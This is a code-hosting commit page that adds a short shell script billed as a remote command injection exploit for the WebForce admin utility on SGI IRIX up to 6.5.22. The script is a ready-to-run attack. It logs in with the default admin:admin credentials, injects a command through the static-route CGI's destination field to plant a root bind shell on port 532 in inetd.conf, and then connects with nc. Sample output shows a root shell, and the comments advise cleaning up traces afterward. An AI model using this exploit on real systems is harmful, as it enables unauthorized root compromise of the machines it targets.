Skip to content

Commit 5e4d35f

Browse files
SGI IRIX <= 6.5.22 WebForce post-auth Remote Command Injection
A wild SGI IRIX 0day RCE appears.
1 parent fa64c46 commit 5e4d35f

File tree

1 file changed

+40
-0
lines changed

1 file changed

+40
-0
lines changed

hfirixwfcmd.sh

Lines changed: 40 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,40 @@
1+
#!/bin/sh
2+
#SGI IRIX <= 6.5.22 WebForce post-auth Remote Command Injection
3+
#==============================================================
4+
#SGI IRIX supports a Webmin and CGI based Administration utility
5+
#known as WebForce which runs by default on tcp port 2077 & 8184.
6+
#The applications use client-side input validation and restrict
7+
#some activities, like running arbitrary commands and viewing
8+
#arbitrary files. The perl scripts in use for adding and deleting
9+
#a static route are vulnerable to command injection through
10+
#system() function. These issues require the "admin" credentials
11+
#for the WebForce service to exploit this issue. This exploit
12+
#uses curl to send the exploit with default credentials and will
13+
#bind a shell on port 532 via inetd.conf. Dont forget to clean up
14+
#inetd.conf and /etc/config/static-routes.option after running.
15+
#
16+
# $ ./hfirixpwn 192.168.11.120
17+
# [+] SGI IRIX <= 6.5.22 WebForce post-auth remote command injection exploit
18+
# [-] sending exploit magic to 192.168.11.120 ...
19+
# [-] done ...
20+
# [-] connecting to your shell ...
21+
# 192.168.11.120 532 (netnews) open
22+
# # id;uname -a
23+
# uid=0(root) gid=0(sys)
24+
# IRIX indiegogo 6.5 10070055 IP22
25+
# #
26+
#
27+
# -- Hacker Fantastic
28+
# https://hacker.house
29+
#
30+
echo [+] SGI IRIX \<= 6.5.22 WebForce post-auth remote command injection exploit
31+
if [ "$1" ]; then
32+
echo [\-] sending exploit magic to $1 ...
33+
curl -s http://$1:2077/admin/static.cgi -u admin:admin -X POST -d "destination=;echo netnews stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;/etc/killall -HUP inetd;&route=127.0.0.1&type=net&doAdd=Ok" 2>&1 > /dev/null
34+
echo [\-] done ...
35+
echo [\-] connecting to your shell ...
36+
sleep 1
37+
nc -v $1 532
38+
else
39+
echo [\!] usage. requires target IP.
40+
fi

0 commit comments

Comments
 (0)